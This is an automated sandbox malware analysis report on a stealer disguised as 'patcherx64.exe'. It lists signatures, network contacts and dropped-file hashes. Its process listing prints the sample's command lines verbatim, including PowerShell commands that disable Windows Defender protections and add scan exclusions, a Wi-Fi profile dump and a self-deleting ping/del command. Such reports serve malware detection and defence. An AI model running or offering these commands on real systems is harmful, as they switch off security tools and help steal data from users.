Malware Analysis Report

2024-11-30 13:17

Sample ID 240620-xr7y7sxckp
Target patcherx64.exe
SHA256 fb63779b452d471a1a34e58031815059f2533134f7ef8dfdb8ccc966779b44de
Tags
execution persistence privilege_escalation spyware stealer upx pyinstaller
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

fb63779b452d471a1a34e58031815059f2533134f7ef8dfdb8ccc966779b44de

Threat Level: Likely malicious

The file patcherx64.exe was found to be: Likely malicious.

Malicious Activity Summary

execution persistence privilege_escalation spyware stealer upx pyinstaller

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Drops startup file

UPX packed file

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Detects Pyinstaller

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs ping.exe

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-20 19:06

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 19:06

Reported

2024-06-20 19:07

Platform

win11-20240611-en

Max time kernel

10s

Max time network

10s

Command Line

"C:\Users\Admin\AppData\Local\Temp\patcherx64.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\patcherx64.exe C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\patcherx64.exe C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3816 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Users\Admin\AppData\Local\Temp\patcherx64.exe
PID 3816 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Users\Admin\AppData\Local\Temp\patcherx64.exe
PID 4368 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2900 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4368 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 2376 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2376 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4368 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 908 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 908 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 3400 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 3400 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 3496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 3496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4368 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 1360 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1360 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4368 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\System32\Wbem\wmic.exe
PID 4368 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\System32\Wbem\wmic.exe
PID 4368 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 2108 wrote to memory of 2232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2108 wrote to memory of 2232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4368 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4976 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4368 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2040 wrote to memory of 2104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4368 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 4368 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\patcherx64.exe C:\Windows\system32\cmd.exe
PID 3036 wrote to memory of 3468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 3036 wrote to memory of 3468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\patcherx64.exe

"C:\Users\Admin\AppData\Local\Temp\patcherx64.exe"

C:\Users\Admin\AppData\Local\Temp\patcherx64.exe

"C:\Users\Admin\AppData\Local\Temp\patcherx64.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\System32\Wbem\wmic.exe

wmic cpu get Name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /F "C:\Users\Admin\AppData\Local\Temp\patcherx64.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 162.159.137.232:443 discord.com tcp
US 172.67.74.152:443 api.ipify.org tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.137.232:443 discord.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI38162\ucrtbase.dll

MD5 0e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA1 4189f4459c54e69c6d3155a82524bda7549a75a6
SHA256 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512 a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

C:\Users\Admin\AppData\Local\Temp\_MEI38162\python310.dll

MD5 bbcb74867bd3f8a691b1f0a394336908
SHA1 aea4b231b9f09bedcd5ce02e1962911edd4b35ad
SHA256 800b5e9a08c3a0f95a2c6f4a3355df8bbbc416e716f95bd6d42b6f0d6fb92f41
SHA512 00745ddd468504b3652bdda757d42ebe756e419d6432ceb029ed3ccde3b99c8ae21b4fc004938bb0babaa169768db385374b29ac121608c5630047e55c40f481

C:\Users\Admin\AppData\Local\Temp\_MEI38162\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

memory/4368-169-0x00007FFC2FCF0000-0x00007FFC3015E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\base_library.zip

MD5 fbd6be906ac7cd45f1d98f5cb05f8275
SHA1 5d563877a549f493da805b4d049641604a6a0408
SHA256 ae35709e6b8538827e3999e61a0345680c5167962296ac7bef62d6b813227fb0
SHA512 1547b02875f3e547c4f5e15c964719c93d7088c7f4fd044f6561bebd29658a54ef044211f9d5cfb4570ca49ed0f17b08011d27fe85914e8c3ea12024c8071e8a

C:\Users\Admin\AppData\Local\Temp\_MEI38162\_ctypes.pyd

MD5 34bc30cb64fb692589e6df7cf62f14af
SHA1 e42884b73090ee37ead7743f161491f04500cdb7
SHA256 5d5c80b2e8a1cf081aa41c35c48f73df384cf526f358e91f80ba2ad48b6e52f7
SHA512 69a6bb5689f33bfa13e5ef9532632a82cd26983d73e2d9ad920588840d7636c86f224553d3cc988e7500bbee9d67d15deb3382af03675e97043cd59707924c2f

C:\Users\Admin\AppData\Local\Temp\_MEI38162\python3.DLL

MD5 c17b7a4b853827f538576f4c3521c653
SHA1 6115047d02fbbad4ff32afb4ebd439f5d529485a
SHA256 d21e60f3dfbf2bab0cc8a06656721fa3347f026df10297674fc635ebf9559a68
SHA512 8e08e702d69df6840781d174c4565e14a28022b40f650fda88d60172be2d4ffd96a3e9426d20718c54072ca0da27e0455cc0394c098b75e062a27559234a3df7

memory/4368-176-0x00007FFC332D0000-0x00007FFC332F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\libffi-7.dll

MD5 ce7d4f152de90a24b0069e3c95fa2b58
SHA1 98e921d9dd396b86ae785d9f8d66f1dc612111c2
SHA256 85ac46f9d1fd15ab12f961e51ba281bff8c0141fa122bfa21a66e13dd4f943e7
SHA512 7b0a1bd9fb5666fe5388cabcef11e2e4038bbdb62bdca46f6e618555c90eb2e466cb5becd7773f1136ee929f10f74c35357b65b038f51967de5c2b62f7045b1f

memory/4368-179-0x00007FFC39AA0000-0x00007FFC39AAF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\_socket.pyd

MD5 26a6147d9ffd545fd80c9ed664d66d06
SHA1 b17b5ec05c012210adb7f0408273d0a40ae4f755
SHA256 35f18dd2452642cefb6f883afc74d560e22aa71bdb6b26e63b076d7ea4246d38
SHA512 447c72662de5fcffa07da8682e4d08f8ced791bfba9a742529766527e5d41ccfef5fa694c8a88bb8798c53c9fc48c33f57dd6c74b5dc49e8f8b15832593e155c

memory/4368-183-0x00007FFC36890000-0x00007FFC368A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\select.pyd

MD5 a3837dc2e2a80fd286c2b07f839738a2
SHA1 b80a20896de81beab905439013adb9e9421f1d2f
SHA256 eee7c64ef7de30dbda1d826bb3b1c3282602d9ef86e5e999a0cd6551287f29d8
SHA512 b14922e30b138401d7b301365644174c3a4b32872fc5688b22ffe759fdfd906f2fa91029f8f6ea235428f07519875aaeb2c4cdb786ca676d4f3ee9d81cddc96d

memory/4368-186-0x00007FFC33700000-0x00007FFC3370D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\_bz2.pyd

MD5 13f9af35bc2ca51e1a0d9f912280832b
SHA1 3b94ed1baa8c1dd1cc9ba73800127367f28177e6
SHA256 5cfa3e2d465614a5f7bdbfe8bbbae012d075bbe83d9561da3f93f4c19f9b94b3
SHA512 0234136e9944963d672bb45abb76540a3ca82dcbc16d6f6185195316f2280253f02173840ccee8db7601f08b08c753b4d46a206e5d2ffbaa40b62e7599e1c3d7

C:\Users\Admin\AppData\Local\Temp\_MEI38162\_lzma.pyd

MD5 73eb1d56265f92ceef7948c5b74a11c1
SHA1 a1d60de9930fd9ed9be920c4d650d42fe07ebc22
SHA256 ee390c28c14e0c33a5601f12eb5d04bdff0ecfb334ce402f4380b8e0ebf7d4de
SHA512 ebc9bc622ad7ef27b16b85db2be7b1f68f2b5de9de5eb2684b5fb3a02e9e851a939f63459cc2eb911263e799ff2c4a918ae98141f61132eb3d110828741f833f

memory/4368-191-0x00007FFC307F0000-0x00007FFC3081D000-memory.dmp

memory/4368-190-0x00007FFC332B0000-0x00007FFC332C9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38162\pyexpat.pyd

MD5 bca9783990260b2bc48475fb919c036b
SHA1 5e1d9c5250724906bfe92821544ddafcd11cdbd8
SHA256 6266dc31c5774e2ea835092cf3f5f80c06afb423cc18ef372c7cfec1596bda55
SHA512 5bb3c5fa7e4f8ff5fde2511dde40b45a7ce8dff38ad8a02e541bd2ac2e712f65635b0ce44643cc5d4c316874af47759da31c25dead5282ae3f370f3f57a498c8

